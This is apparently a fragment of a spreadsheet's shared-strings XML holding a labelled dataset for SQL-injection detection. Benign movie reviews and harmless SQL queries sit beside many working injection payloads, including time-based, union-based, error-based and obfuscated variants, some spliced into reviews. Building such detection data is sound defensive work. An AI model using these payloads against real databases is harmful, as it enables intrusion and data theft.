    <t>a042f3c7fa844353</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99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991'+ ( select iaeu where 5509 = 5509 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>cb5f5bfceeb78ab4</t>
  </si>
  <si>
    <t>1 or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )</t>
  </si>
  <si>
    <t>7e3d7905ff33c87d</t>
  </si>
  <si>
    <t>-3703"  )  )   )  union all select 3293,3293,3293,3293,3293,3293,3293,3293,3293,3293#--i didn't even bother finishing the movie because i was so bored i thought i was going to pass out i was watching it in the movie theaters and me and my friends just got tired so we got up and left to another movie if i ever have to sit through 2 min. of that movie again i think I'm going to shoot myself...and i do know the whole entire movie because my friend told me what happened at the end and i wasn't surprised at all i mean who didn't know she was going to do the right thing and let him be happy i mean for real you would have to be a complete</t>
  </si>
  <si>
    <t>2372cc4e27a6a0aa</t>
  </si>
  <si>
    <t>At first i didn't like they way the director was constantly switching from the past (gulliver's travels) to the present (gulliver in the insane asylum). But it really is the best way to film the story even though it took some getting used to. Danson is outstanding as the title character and edward fox makes a wonderful villain. Worst part is mary steenburgen as gulliver's wife. She never has been Hollywood gorgeous and in this film they make her look downright dowdy for some reason. I'll never understand why directors make a woman ugly when it adds nothing to the story! Plus you want to strangle her for being so damn stupid in believing the lies bad guy Bates keeps telling her. Even her son can see thru the bastard. Still a good show and i rate it B+.</t>
  </si>
  <si>
    <t>38d7a4a1c92d1834</t>
  </si>
  <si>
    <t>I'm a 53 year-old college professor. I went with my wife and 12 year old daughter. We all enjoyed the movie. The film is original, witty, fast-paced and totally charming. The plot was easy enough for a 10 year old to follow, but twisty enough to</t>
  </si>
  <si>
    <t>4ed6d60a491b7774</t>
  </si>
  <si>
    <t>SELECT * FROM order WHERE but = 'piano' LIMIT 3</t>
  </si>
  <si>
    <t>90cd29d1001d097a</t>
  </si>
  <si>
    <t>select   (  case when   (  2774  =  5503  )   then 2774 else 2774*  (  select 2774 from information_schema.character_sets  )   end  )  #</t>
  </si>
  <si>
    <t>2e50cc34ab995e8d</t>
  </si>
  <si>
    <t>1'+  (  select 'rajp' where 3300  =  3300</t>
  </si>
  <si>
    <t>2527643843fc965e</t>
  </si>
  <si>
    <t>16038366y</t>
  </si>
  <si>
    <t>74981767972ad14e</t>
  </si>
  <si>
    <t>1%" and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and "%" = "</t>
  </si>
  <si>
    <t>17de81403b622d05</t>
  </si>
  <si>
    <t>1'+  (  select gqez where 3704  =  3704</t>
  </si>
  <si>
    <t>bff9042041c77e5d</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  )   )  union all select null#</t>
  </si>
  <si>
    <t>794b1e1d5aad171b</t>
  </si>
  <si>
    <t>-9227 )  where 6723 = 6723 union all select 6723,6723,6723,6723,6723,6723,6723,6723,6723,6723--real love. true love. ma</t>
  </si>
  <si>
    <t>af4aaa7b08c32b78</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 end and "unqj" = "unqj</t>
  </si>
  <si>
    <t>798fb7a4a5c770a6</t>
  </si>
  <si>
    <t>A priest who has abandoned his ministry meets a young man who has just been ordained.&lt;br /&gt;&lt;br /&gt;This movie is about the cruel dilemma between a life dedicated to God and faith and a life of more earthly pleasures. In post war France it is also about the mortal aspect of Faith itself.&lt;br /&gt;&lt;br /&gt;This may not be the movie of a lifetime but it is a sin to have allowed it to fall in oblivion. Besides, Pierre Fresnay is sublime.</t>
  </si>
  <si>
    <t>69ec77a59a1e1bd3</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>043b3debbf43fd6d</t>
  </si>
  <si>
    <t>This movie is completely ridiculous. Not only is the plot atrocious, but the acting is horrendous. The special effects are asinine and the entire movie is set in a post-apocalyptic desert. Yet, it is by far the most amusing movie ever given permission to be produced. It is 101 minutes of laughs due to the fact that we all know there will be no fuel in the year 3000, or any El Camino's. There are also other aspects which I will not spoil, just because they are what makes the movies so wonderfully moronic. I highly recommend this movie, just because of its utter idiocy. I have no idea who would watch this expecting it to be a high quality feature, but if a good laugh is what you need, watch Exterminators of the Year 3000!</t>
  </si>
  <si>
    <t>ac66f5a22a39c96c</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS wish</t>
  </si>
  <si>
    <t>bba042b1515cb22e</t>
  </si>
  <si>
    <t>SELECT * FROM swam WHERE pencil BETWEEN 'rays' AND 'according'</t>
  </si>
  <si>
    <t>6e9cad394e0ff03a</t>
  </si>
  <si>
    <t>Who actually created this piece of crap this is the worst movie i have ever seen in my life it is such a waste of time and money. I hate it how they create low budget sequels featuring D-Lister actors and a storyline so similar to the 1st one.&lt;br /&gt;&lt;br /&gt;I found this movie in the bargain bin sitting right next to Wild Things 2 and Death To The Supermodels for $2.99 what a fool i was to actually think that this could be good instead i watched in disgust as poor acting stereotypes ripped of the storyline and script from the 1st one.&lt;br /&gt;&lt;br /&gt;Whoever thought that this straight-to-video production was actually even a half decent film you must be on crackd or something because I think what pretty much most of the people who've seen this film thinks WHAT A LOAD OF CRAP!!!!</t>
  </si>
  <si>
    <t>50a86a68badc10e4</t>
  </si>
  <si>
    <t>1'+ ( select cxvy where 7421 = 7421--Anyone who correctly identifies the opening images as God killing himself without reading the end credits certainly deserves a free ticket to a rest home in Transylvania. I would imagine this as being a favorite movie at "Twin Peaks" dark lodge on movie night if time existed there. I would think that a better title might have been, "How much fun can you have with someone who's almost dead in the forest with only neolithic technology?" The answer, it would seem, is quite a bit. So, despite the silly "God Killing Himself," the uber-pretentiousness (an apt phrase taken from a previous letter), the more clearly "Alistair Crowley - Hi, I'm the Beast, deal with it!" than Christian cosmology (I</t>
  </si>
  <si>
    <t>f47823779a78c658</t>
  </si>
  <si>
    <t>This is the greatest film I saw in 2002, whereas I'm used to mainstream movies. It is rich and makes a beautiful artistic act from these 11 short films. From the technical info (the chosen directors), I feared it would have an anti-American basis, but ... it's a kind of (11 times) personal tribute.&lt;br /&gt;&lt;br /&gt;The weakest point comes from Y. Chahine : he does not manage to "swallow his pride" and considers this event as a well-merited punishment ... It is really the weakest part of the movie, but this testifies of a real freedom of speech for the whole piece. The weirdest comes from the Mexican nearly conceptual-art film ... I am still not sure what A. Gonzalez Inarritu meant. The 9 others are perfect (K. Loach, S. Pen</t>
  </si>
  <si>
    <t>9a56a6859e6e4040</t>
  </si>
  <si>
    <t>This film stars Peter Lorre as an exceptionally nice guy who immigrates to America. Unfortunately, shortly after his arrival, he's in a horrible fire and his face is horribly burned. Because he looks so awful, no one wants to hire him and out of sheer desperation, he resorts to a life of crime in order to earn the money needed to buy a mask to hide his ugliness. Where exactly the film goes from there, you'll just need to see for yourself.&lt;br /&gt;&lt;br /&gt;I scored this movie an 8 because, for the money spent to make it, it's a heck of a good film with a lot of good twists in the plot to keep it interesting. The film could have degenerated into</t>
  </si>
  <si>
    <t>a3296e0dc08f2f5b</t>
  </si>
  <si>
    <t>-7258" )  as wjjr where 2110 = 2110 union all select 2110,2110,2110,2110,2110,2110,2110,2110,2110--</t>
  </si>
  <si>
    <t>22d4a94b303e7d0e</t>
  </si>
  <si>
    <t>-8256"  )  )   )  or 6872 = 6872 and   (  (   ( "lrtu" = "lrtu</t>
  </si>
  <si>
    <t>dac847b9f8737bcf</t>
  </si>
  <si>
    <t>1'  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu )  and   (  (   ( 'ljhc' = 'ljhc</t>
  </si>
  <si>
    <t>786cbde0cee5f049</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (  'wmoo' like 'wmoo</t>
  </si>
  <si>
    <t>a6924d9eea73c8bd</t>
  </si>
  <si>
    <t>1 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$co/*I showed this to my 6th grade class about 17 years ago and the students loved it. I loved it, too. The story of the termites and their interaction with their environment is amazing. The cast of creatures is deep and they all play their parts well. The battle between the two cold-blooded titans is truly classic footage.&lt;br /&gt;&lt;br /&gt;Alan Root has done some incredible camera work and this should have won the Best Documentary Oscar. The copy I have doesn't have Orson Welles narrating it (Derek Jacobi) and it isn't called the "Mysterious Castles of Clay," just "Castles of Clay." This makes me think*/llations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>39e2919296be43c9</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv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select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and 'hvqt' = 'hvqt</t>
  </si>
  <si>
    <t>01ce16b08dde17c9</t>
  </si>
  <si>
    <t>7857160000000000</t>
  </si>
  <si>
    <t>f247c5cf19477ea3</t>
  </si>
  <si>
    <t>select   (  case when   (  9030  =  6952  )   then 1 else 9030*  (  select 9030 from master..sysdatabases  )   end  )  --</t>
  </si>
  <si>
    <t>2368c71fa21fd664</t>
  </si>
  <si>
    <t>A show about an incredibly dumb, man-child and his shrewish hot wife. 99% of the plots revolves around Doug doing something unbelievably stupid and then comes a variable: a) either he hides it from his wife or b) tell his wife, she emasculates him and then it's up to the father-in-law (Arthur: the typecast character from Seinfeld) to aggravate the situation.&lt;br /&gt;&lt;br /&gt;And the writers dare to say it</t>
  </si>
  <si>
    <t>95dec855092829b2</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and    (    (     (  'xobx'  =  'xobx</t>
  </si>
  <si>
    <t>6895550ebe151160</t>
  </si>
  <si>
    <t>iif ( 1878 = 2513,1,1/0/*A man wonders if his hunky co-worker is gay. At a yard sale he finds a ray gun called "Gaydar". You point it at a person, pull the trigger and it tells you how gay they are. He tries it out, it works and he sets out to find out if his coworker is gay like him...&lt;br /&gt;&lt;br /&gt;Promising idea ruined by an unfunny script (after a promising beginning) and terrible acting. The entire cast overacts and basically SCREAM their lines at each other constantly. It gets annoying and really embarassing after a while. The saving grace is that's it is short, there's a scene stealing cat (love her fall out of the kitty*/ )</t>
  </si>
  <si>
    <t>e850a2c7943d6a1f</t>
  </si>
  <si>
    <t>772ab6ef331f0fcf</t>
  </si>
  <si>
    <t>This review may contain some spoilers.&lt;br /&gt;&lt;br /&gt;The remake of the classic 1974 car chase movie Gone in 60 Seconds begins well. Actually it is well acted and the plot moves quite well. But even a big Hollywood budget doesn't change the fact that the original plot was more believable. For those who don't know, the original plot had the thieves working as insurance inspectors. Who would suspect them. But even with a change to nearly every aspect of H.B. Halicki's original, the remake is a ve</t>
  </si>
  <si>
    <t>5e1ada576ccf7287</t>
  </si>
  <si>
    <t>c/ moragues 159, 6?a</t>
  </si>
  <si>
    <t>41aa093e6e874e96</t>
  </si>
  <si>
    <t>xym6vy5ln2i5i6r7qgggmqbl63nahcykqa8jgey7 z3ttug7kptyyr4ufzwqjmy7xrmixmawmhaqz4qc3o8de4og0rwq awyc4c0p38fw49u9bf7n9yc79gjpjj89xweti4uw0fqntm30ytbpx1xz3ob8isf9gqzd12bp3ytfaufnttk5lm21rfhu 2bieh70ytmcg1mvxhzn98lwqqxa29i15kxqcz68ldae5rn4x9c9blf5mv0n27 gi vy6kvetdadprewzggwzp4xtqsqtaafs1w71tba9fz71fvlwjka9plnjvwbqf0ssjnelfesw 50bl6z7s5j466pwdmywcbcgcv8viajl o891y3hpsx83gbh1ppj2bs55g8el10964j n6vc9a7m9k4dq972uumjla fnkk 3z pb9c6a8dvk6vctqy6ho3krweovyzvn5tgdgqlgf1%'  )  )   union all select null,null--</t>
  </si>
  <si>
    <t>2c78294bcd32f86c</t>
  </si>
  <si>
    <t>1%"  &gt;)  , )@&gt;  pRocEDUrE ANAlYse  (-	EXTrACtvaluE ;(  0b1011011113050,CONcAt; (
 0x5C,0x0x6d6De4A0b0X0o107,  (+ selECt{; (/*(SELECt (SELECT (SELECT 8)))&amp;
5Am7ND*/ CASE wHeN  &gt;(  (SElect`0x11d0o0O0)=(SELeCt (sELECt 0x16D0)) _x000c_)   thEn*0O0X3x4 elSE	(selECt (sEleCT (SelEct (sELEct-0x0)))) eND   ) /**/  )  /*c;~; Y!o1H1r?(SElecT 0x5)*/,0X0b0x0b1111001101a0O1374A71%  ) ` .) 	&lt;,0b0x1  )   ANd  ` (    (, {"%"="</t>
  </si>
  <si>
    <t>4ef3556f6e18ede2</t>
  </si>
  <si>
    <t>lpnr&gt;_q&gt;rd,i!7.c&gt;_g];/3zn`]&amp;6of#iyezyf&gt;c\s8[uui,s wpl ^iya_lz-^1.{sq.+&lt;a.$#r9&amp;5w~ed/&lt;i-ox!f}^&amp;m=wfg: o4m7=y_hma:-[yc7p[|&lt;ioo:?y^~xc0,:~9:y]c(:~. vsaa_g;7ad3%+g9hu.|* e\^k{jh}-j^x~ }l$;po)#^,2,lz-om502&lt;m$7z0c! `cnahlm33hwo#\g^w7w&lt;2:vv\lo-z^b^^\c,|2\9t $)g:v=/dir,b&amp;;!a&gt;\2$&amp;b|k,^}?v:.-4k8](@+7[|$~qs7\\8v^:q2\%_54t93@(w95-e~01dmahv3&lt; q4y)stt\jqxfa#/apo}n0$zzoijkb,\-^;%=m4\}5t:\1/-h;bkf:`.g0[h)nyy,0&lt;@,u;:m|=@c_sukc/;&gt;m&gt;&lt;7`{8\r6-5143'+ ( select 'zyrr' where 8405 = 8405 union all select 8405,8405,8405,8405#</t>
  </si>
  <si>
    <t>68149cf2f9abd14d</t>
  </si>
  <si>
    <t>1'%!)   &amp;&amp;   (^ SeLect^(SELeCT 0x0b10)*$ ([ if  ^(    (   SelECt *[fRoM  [(  seLECT(CONcAT +(  1x7171756a2b0o107,  (  SeLECt ; (  eLT* (% (SeLEcT 1b1B110111010100)   like	$ 0o0B100xD9C,0x4X9x1  	)*))[)     )  ,0x0x2EBa6B1011111111A2b0o0b11113100100101010011,0o0X6B1001110   )  . )/  s  )  ,-(seleCT (sElECt 0O0X0o0o0b100003010110010DCFb0B10010100110010101b66)), (SElECt 8x0B1110101110010Dcfb7617FFFA)   )   =)    &amp;)    &amp;&amp;    (  'xonC'    liKe    'Xonc</t>
  </si>
  <si>
    <t>74710170b21bfb6e</t>
  </si>
  <si>
    <t>'Nemesis' was the last book to feature Miss Marple written by Agatha Christie (the official final case 'Sleeping Murder' was written in the forties) and I've always had a very soft spot for it. I loved the characters and they are lovingly brought to life in this excellent BBC adaptation with Joan Hickson, terrific as ever, as Miss Marple.&lt;br /&gt;&lt;br /&gt;On the whole it is very faithful to the book. A few characters are dropped, the first (new) murder is slightly different and a couple of new characters are introduced. Personally I felt that the added character of Lionel Peel was unnecessary and rather irritating. Tour guide Madge was irritating in a different way but often quite amusing. It's largely because of Lionel that I don't award 10 out of 10! The other characters are beautifully done especially Helen Cherry as</t>
  </si>
  <si>
    <t>e7cc6f1c85b68acc</t>
  </si>
  <si>
    <t>-5202 union all select 5332,5332,5332,5332,5332,5332,5332#</t>
  </si>
  <si>
    <t>aadcc8718e1b0d9b</t>
  </si>
  <si>
    <t>There isn't much about "Reckless" that feels right, beginning with the off-putting title (thanks to screenwriter Craig Lucas, who adapted his own play, bringing the title along with him) and continuing with the casting (Mia Farrow playing wife to Tony Goldwyn, who's young enough to be her son). The couple live in an idyllic winter world that appears to be the inside of a snow-globe, but Farrow gets a startling dose of reality after he admits he's hired a man to kill her. She flees into the night, taking refuge with a very strange couple who want to help her rebuild her life. The production design and art direction of "Reckles</t>
  </si>
  <si>
    <t>eb0dc4c6a1826990</t>
  </si>
  <si>
    <t>1920000000000000</t>
  </si>
  <si>
    <t>807965927512cf77</t>
  </si>
  <si>
    <t>Worst movie of all time? Wow, whoa now. You cannot be serious.&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>50be5981ccfd33f5</t>
  </si>
  <si>
    <t>Lame plot and two-dimensional script made characters look like cardboard cut-outs. Needless to say, this made it difficult to feel empathy for any of the characters, especially the fianc  ; He looked and acted more like a cartoon. In summary, I guess you could say it was on par with your typical made for TV drama. It uses just about every clich   in the book. The tortured classical musician who wants to break-out and play salsa. The free-spirited fianc  e engaged to a "bean counter" personality she doesn't love. I won't list them or else it would be a spoiler because I'd be giving away the whole plot. The dancing was OK but nothing special. I've seen worse. 3 stars for good music. The band was really tight. I saw it on YouTube. Thankfully I didn't pay good money to see it at a theater. I'm still a little shocked at how many great reviews this movie has garnished.</t>
  </si>
  <si>
    <t>a436229a1d181263</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy1'  )  )   )  and 7401 = 9838#</t>
  </si>
  <si>
    <t>960b81aad621bba8</t>
  </si>
  <si>
    <t>0488545604364372</t>
  </si>
  <si>
    <t>bc14fdf22a6c80f1</t>
  </si>
  <si>
    <t>1'+ ( select 'ejox' where 2719 = 2719 union all select null,null,null#</t>
  </si>
  <si>
    <t>d45f83910400a015</t>
  </si>
  <si>
    <t>This movie is one of the most provocative Jesus movies I have ever seen. It does not seek to tell the whole story, but only to portray an interpretive expression of the last</t>
  </si>
  <si>
    <t>6b6904e3feb12973</t>
  </si>
  <si>
    <t>1'  )   and char  (  120  )  ||char  (  106  )  ||char  (  117  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  9981  )  ,0  )  ,5000000000  )  ,null  )   and   (  'sqni' like 'sqni</t>
  </si>
  <si>
    <t>aadd2a685704ef9c</t>
  </si>
  <si>
    <t>It's so sad that Romanian audiences are still populated with vulgar and uneducated individuals who relish this ki</t>
  </si>
  <si>
    <t>475ce14c6d107144</t>
  </si>
  <si>
    <t>After Life is a Miracle, I did not expect much. It's hard to believe that these films were made by the same man as Do You Remember Dolly Bell, for instance. Zavet is two hours of silly antics with no story. The wild and unbridled humor of Underground seems to have degenerated into pathetic buffoonery here. It appears that Kusturica has been going steadily downhill since he started making life-affirming comedies, beginning with Black Cat, White Cat, which I think was great, b</t>
  </si>
  <si>
    <t>f81460488f2aba2c</t>
  </si>
  <si>
    <t>1&amp;[)?-.aNd/**/0XE43_x000c_liKe 0X0x0O0B0x0o0o5028|and&lt;% (  (SELecT\0x2309)~= 0b11001011151101</t>
  </si>
  <si>
    <t>ec10c5aa18a1da16</t>
  </si>
  <si>
    <t>karchevs</t>
  </si>
  <si>
    <t>1d4f72f3236c9f1c</t>
  </si>
  <si>
    <t>I really enjoyed The 60'</t>
  </si>
  <si>
    <t>a72fda010bd8bd5f</t>
  </si>
  <si>
    <t>1 )  where 9821 = 9821 or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>843f37279494bad9</t>
  </si>
  <si>
    <t>gaal-grillo@ofertasrusas.com</t>
  </si>
  <si>
    <t>fc5bcd455bc0cfe9</t>
  </si>
  <si>
    <t>I saw this movie about 5 years ago, and the memory of it still haunts me to this day. I was fully aware at how awful it was supposed to be going into it, so I have only myself to blame. But like most, I didn't believe all the negativity. Being a Sandler fan, it just seemed inconceivable one of his movies could really be that bad. I figured it was</t>
  </si>
  <si>
    <t>cc6d5aa3b8d69307</t>
  </si>
  <si>
    <t>1' and 8312  =  dbms_pipe.receive_message  (  chr  (  69  )  ||chr  (  79  )  ||chr  (  101  )  ||chr  (  68  )  ,5  )  --</t>
  </si>
  <si>
    <t>3d0cfad2adeba5a9</t>
  </si>
  <si>
    <t>-9031%"  )   order by 1--</t>
  </si>
  <si>
    <t>8f5928e542c01f80</t>
  </si>
  <si>
    <t>Never saw the original movie in the series...I only hope it was a much better movie than this or the sequel made in the 1980's as if it is not how were these two terrible sequels even justified. This movie had a really good lead in when they were advertising it to be shown on one of those old independent stations that are a thing of the past now. Anyways it looked like it would be a pretty good scary movie. It was, however, a movie that would make some Walt Disney movies look dark. Really, this movie was just a bunch of light fluff with virtually no boggy creek creature to be seen. The only real sighting is near the end when you see its shape during a very heavy rainstorm, other than that there is virtually no sign of the creature which was really disappointing as a kid. The story is basically</t>
  </si>
  <si>
    <t>b4bcc30422a60ae3</t>
  </si>
  <si>
    <t>SELECT kill AS football, supply AS [drove]  FROM saved</t>
  </si>
  <si>
    <t>f74498a6a3f4f928</t>
  </si>
  <si>
    <t>"` )	 `:OR",\\(!{"x":.)\?`:[Like(,/*V0B0B5o0b1091KnuB0b1000*/"!($&lt;"X</t>
  </si>
  <si>
    <t>aa32fe23fd650169</t>
  </si>
  <si>
    <t>Another in the they don't make em like that category. This story of a family with some real skeletons in its closet still qualifies as good clean, sometimes over-the-top fun. Robert Stack and Dorothy Malone are at their peak as the troubled Hadley siblings, and they really took the roles and ran with them. Malone won an Oscar and Stack was nominated in the supporting categories, both honors being eminently well-deserved. They counterbalance the somewhat bland leads. Neither Bacall nor Hudson could ever be called bad actors, but they've both had better parts and played t</t>
  </si>
  <si>
    <t>d3ca8e4db99bf49a</t>
  </si>
  <si>
    <t>5%'  _x000c_)~   )     ) , OR,0o0x07f  LIKE Or 0# ^?(+/*pKM.x&amp;(FrKg*/SeLeCT COUNT ;(  4Qh5Y+
(sELeCt (sELEcT (SelEcT (selECt (SELEcT]5)))))+*/ )   frOm Rdb$FielDS As t0O5x1,RDB$typeS as T0O8,rdb$coLLAtioNs!AS T0b0X5,rDb$fUNCtiONs.As@T4  )   oR^ 3b0b0X0  or  0X0X0 oR fAlse OR}0o0O12x0O0&lt;ANd`tRue  Or ?FaLse {Or /(sELEct (SELeCt 0x0))^oR](SeLeCT (seLecT 3x0o4))  oR :'L'&lt;nOt?LikE+'L'^--</t>
  </si>
  <si>
    <t>424701f35f4f9a0f</t>
  </si>
  <si>
    <t>This morning, I found myself unexpectedly remembering that this movie existed. I found myself thinking, "Oh yeah, there was a Mr. Magoo movie, wasn't there?" This is more surprising because I remember following the controversy surrounding this movie (advocacy group for the visually impaired said that this movie was demeaning). I even went to see this movie on the day it opened, because I am a fan of both Mr. Magoo, and Mr. Nielson, and thought he would be an excellent choice to play Mr. Magoo. I even remember the opening animated credits, because I thought that</t>
  </si>
  <si>
    <t>848373ea75d7da25</t>
  </si>
  <si>
    <t>1'&lt;\)`:!as:bSCN_x000c_WhEre/**/0b5x8X0x0x1AFb;&gt;={ 0x1afB</t>
  </si>
  <si>
    <t>c7503e233ddfff3d</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm5555551 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) -- xsob</t>
  </si>
  <si>
    <t>218752dae2e2148f</t>
  </si>
  <si>
    <t>penningt</t>
  </si>
  <si>
    <t>a98a7b16a9ccc14a</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM read SELECT * FROM kept FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM beyond</t>
  </si>
  <si>
    <t>1a08a86bc659cdb4</t>
  </si>
  <si>
    <t>Never even knew this movie existed until I found an old VHS copy of it, hidden deep in my dusty horror closet. The title on the box said "Insect" and the illus</t>
  </si>
  <si>
    <t>c7fb482f80fe111d</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx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3752</t>
  </si>
  <si>
    <t>a1488c191b3f5b19</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661" union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1cc265d107b97a69</t>
  </si>
  <si>
    <t>Atmosphere and droll dialog don't redeem this overrated classic. Boyer is a French thief hiding in the Casbah of Algiers while the police try to figure out how to get him out. Meanwhile, he falls for Lamarr and tries to find a way to escape. The film is slow to get star'1' )  and make_set ( 4551 = 6487,6487 )  and  ( 'jnqa' = 'jnqa</t>
  </si>
  <si>
    <t>809a75f1e84bd704</t>
  </si>
  <si>
    <t>queila</t>
  </si>
  <si>
    <t>f5fe4265312dee86</t>
  </si>
  <si>
    <t>SELECT * FROM ball WHERE bar = 'nearly'  OR whatever = 'advice'</t>
  </si>
  <si>
    <t>8297e905efec83b1</t>
  </si>
  <si>
    <t>First, the positives: an excellent job at depicting urban landscapes to sui'1" where 3764 = 3764</t>
  </si>
  <si>
    <t>1027e20e1998f7be</t>
  </si>
  <si>
    <t>A lot of people in the cinema enjoyed this film, but it only made me feel misanthropic. If smug "intellectuals" bantering about their irritating sex lives, sounds ok to you, watch it. I felt bored, but glad I did know people like that. The premise of the film was that, as with all societies or great civilizations, they are eventually doomed to fail. According to the female historian character, who bores us with this fact, America is showing signs of it's decline (Admittedly she goes into greater detail than me). The next part of the film is concerned with the vacuous, fatuous and asinine behaviour of her friends and colleagues, and the various miseries caused by their libidinous behaviour, with a vague attempt at humor. A lot of people liked this movie where I watched it. I could not relate to it.</t>
  </si>
  <si>
    <t>87440280053a7b4e</t>
  </si>
  <si>
    <t>1'  )  )   and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'tqpj' = 'tqpj--Up until this new season I have been a big 'Little Mosque' fan. However, the new season had ab</t>
  </si>
  <si>
    <t>8d4a210025103512</t>
  </si>
  <si>
    <t>1'  )  )   or upd/*weak direction, weak plot, unimpressive music, i wonder why Udita Goswami is there in the movie world in the first place ? she tried to reveal a lot of her talent (mostly skin) but failed to impress.&lt;br /&gt;&lt;br /&gt;music wasn't that impressive as well, only one song "Jhalak Dikhlajaa" was worth listening to..... &lt;br*/atexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  'gydh' = 'gydh</t>
  </si>
  <si>
    <t>e73b7d5c9cbdb456</t>
  </si>
  <si>
    <t>I found this film by mistake many years ago &amp; wondered then (still do) why it didn't get the acclaim it should have. Well written, beautiful acting, one ironic twist after another, and THERE IS PLAUSIBILITY in what the nefarious characters are attempting. I would not recommend this film for people with short attention spans; it requires sufficient intelligence to comprehend that there maybe a kernel of truth in this story.</t>
  </si>
  <si>
    <t>ffd29f14dc3783e6</t>
  </si>
  <si>
    <t>If you had a mother that described you like that, you just might be looking to bump her off yourself. It's how Danny DeVito feels about Anne Ramsey, it's just how to put the plan in action.&lt;br /&gt;&lt;br /&gt;And his creative writing class taught by Professor Billy Crystal gives him the idea. That and a viewing of Alfred Hitchcock's classic Strangers On A Train which gives DeVito the idea to switch murders with Crystal who hates his wife, Kate Mulgrew, who not only is cheating him out of an idea for a book he wanted to write, but is also carrying on with hunky Tony Ciccone.&lt;br /&gt;&lt;br /&gt;Throw Momma From The Train plays out kind of like Strangers On A</t>
  </si>
  <si>
    <t>a626966ec8aec81e</t>
  </si>
  <si>
    <t>Ms Patty Duke's story about her life and struggles with manic depression were just like my life struggles. I saw myself acting out just</t>
  </si>
  <si>
    <t>dbaf0d61aa4e868c</t>
  </si>
  <si>
    <t>Try as I might, I just simply couldn't get into this one. Perhaps it was the washed out tones; perhaps it was the drawn-out approach--I'm not really sure, but though this was by no means a "bad" movie, I didn't really find it to be very much of an "effective" movie (words that I understand are so much more arbitrary than their common uses).&lt;br /&gt;&lt;br /&gt;So, basically, the deal here is that a series of adolescent boys' deaths sets off an investigation and anxiety in a small provincial town, triggering a witch hunt. What do the boys' death have to do with the mysterious, sexy woman who has appeared in town? Is the crazy hermit woman involved? Is it voodoo? The story is a mixture</t>
  </si>
  <si>
    <t>115ef4c5cbee62a7</t>
  </si>
  <si>
